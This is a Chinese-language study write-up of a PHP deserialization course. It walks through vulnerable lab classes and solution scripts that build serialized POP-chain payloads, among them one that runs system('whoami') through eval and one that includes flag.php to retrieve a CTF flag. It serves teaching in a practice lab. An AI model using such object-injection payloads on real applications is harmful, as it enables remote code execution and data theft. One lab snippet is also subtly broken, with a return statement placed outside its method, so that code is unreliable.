Web渗透—反序列化 课程学习分享(课程非本人制作,仅提供学习分享)
靶场下载地址:GitHub - mcc0624/php_ser_Class: php反序列化靶场课程,基于课程制作的靶场
课程地址:PHP反序列化漏洞学习_哔哩哔_bilibili
十、pop链前置知识-成员属性赋值对象
1.反序列化例题
<?php
class index {
    private $test;
    public function __construct(){
        $this->test = new normal();
    }
    public function __destruct(){         //反序列化unserialize()触发魔术方法destruct()
        $this->test->action();            //destruct()从$test调用action()
    }
}
class normal {
    public function action(){
        echo "please attack me";
    }
}
class evil {
    var $test2;
    public function action(){             //eval()调用$test2
        eval($this->test2);               //可利用漏洞点在函数eval(),(可执行漏洞)
    }
}
unserialize($_GET['test']);
?> 
关联点:如何让$test调用evil里面的成员方法action()
解决思路:给$test赋值为对象test = new evil()
2.解题代码
<?php
class index {
    private $test;
    public function __construct(){
        $this->test = new evil();        //关联步骤:给$test赋值实例化对象test = new evil()
    }
}
class evil {                             //序列化只能序列化成员属性,不能序列化成员方法
    var $test2 = "system('whoami');";    //构造命令语句
}
$a = new index();                        //实例化对象index(),自动调用__construct()
echo urlencode(serialize($a));
?> 
输出结果:
O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D
解题方法:
此时$a为实例化对象index(),其中成员属性$test=new evil(),$test为实例化对象evil(),成员属性$test=”system(‘whoami’);”;
回显结果:

十一、pop链前置知识-魔术方法触发规则
魔术方法触发的前提:魔术方法所在类(或对象)被调用
1.例题代码
(目标:显示”toString is here!!”)
<?php
class fast {
    public $source;
    public function __wakeup(){
        echo "wakeup is here!!";
        echo  $this->source;             //3.在echo中的source包含实例化sec()的对象
    }
}
class sec {
    var $benben;
    public function __tostring(){        //2.把sec()实例化成对象后当成字符串输出
        echo "tostring is here!!";       //1.需要触发__toString()
    }
}
$b = $_GET['benben'];
unserialize($b);
?> 
 
2.解题代码
<?php
class fast {
    public $source;
}
class sec {
    var $benben;
}
$a = new fast();
$b = new sec();
$a -> source = $b;      //将$b当成字符串赋值给source
echo serialize($a);     //在触发wakeup后执行echo从而触发sec里的__toString
?> 
在对象$a里让source赋值对象$b,再触发wakeup后执行echo从而触发sec里的toString
输出结果:
O:4:"fast":1:{s:6:"source";O:3:"sec":1:{s:6:"benben";N;}}
回显结果:

十二、pop链构造和poc编写
1.POP链
在反序列化中,我们能控制的数据就是对象中的属性值(成员变量),所以在PHP反序列化中有一种漏洞利用方法叫“面向属性编程”,即POP(Property Oriented Programming)。
POP链就是利用魔法方法在里面进行多次跳转然后获得敏感数据的一种payload。
2.POC编写
POC(全称:Proof of concept)中文译做概念验证。在安全界可以理解成漏洞验证程序,POC是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。
编写一段不完整的程序,获取所需要的的序列化字符串。
3.例题代码
<?php
//flag is in flag.php
class Modifier {
    private $var;
    public function append($value){
        include($value);
        echo $flag;                   //1.目标:触发echo输出$flag
    }
    public function __invoke(){       //2.触发invoke,调用append,并使$var=flag.php
        $this->append($this->var);    //3.invoke触发条件:把对象当成函数
    }
}
class Show{
    public $source;
    public $str;
    public function __toString(){     //7.触发toString(触发条件:把对象当做字符串)
        return $this->str->source;
                                      //6.给$str赋值为对象Test,而Test中不存在成员属性source,则可触发Test里的成员方法
    }
    public function __wakeup(){
        echo $this->source;           //8.给$source赋值为对象Show,当成字符串被echo调用,触发toString
    }
}
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){     //5.触发get,(触发条件:调用不存在的成员属性)
        $function = $this->p;        //4.给$p赋值为对象,即function成为对象Modifier,却被当成函数调用,触发Modifier中的invoke
    }
    return $function();
}
if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
?> 
解题思路:
第一步:触发invoke,使$var=flag.php;
第二步:触发get,给$p赋值为对象Modifier
第三步:触发toString,给$str赋值为对象Test
第四步:触发wakeup,给$source赋值为对象Show
4.解题代码
<?php
class Modifier {
    private $var="flag.php";     //根据提示flag在flag.php,将$var赋值为flag.php
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
}
$a = new Modifier();             //实例化Modifier为$a
$b = new Show();                 //实例化Show为$b
$c = new Test();                 //实例化Test为$c
$c -> p = $a;
$b -> str = $c;
$b -> source = $b;
echo urlencode(serialize($b));
?> 
输出结果:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A13%3A%22%00Modifier%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D
回显结果:
获得ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}




















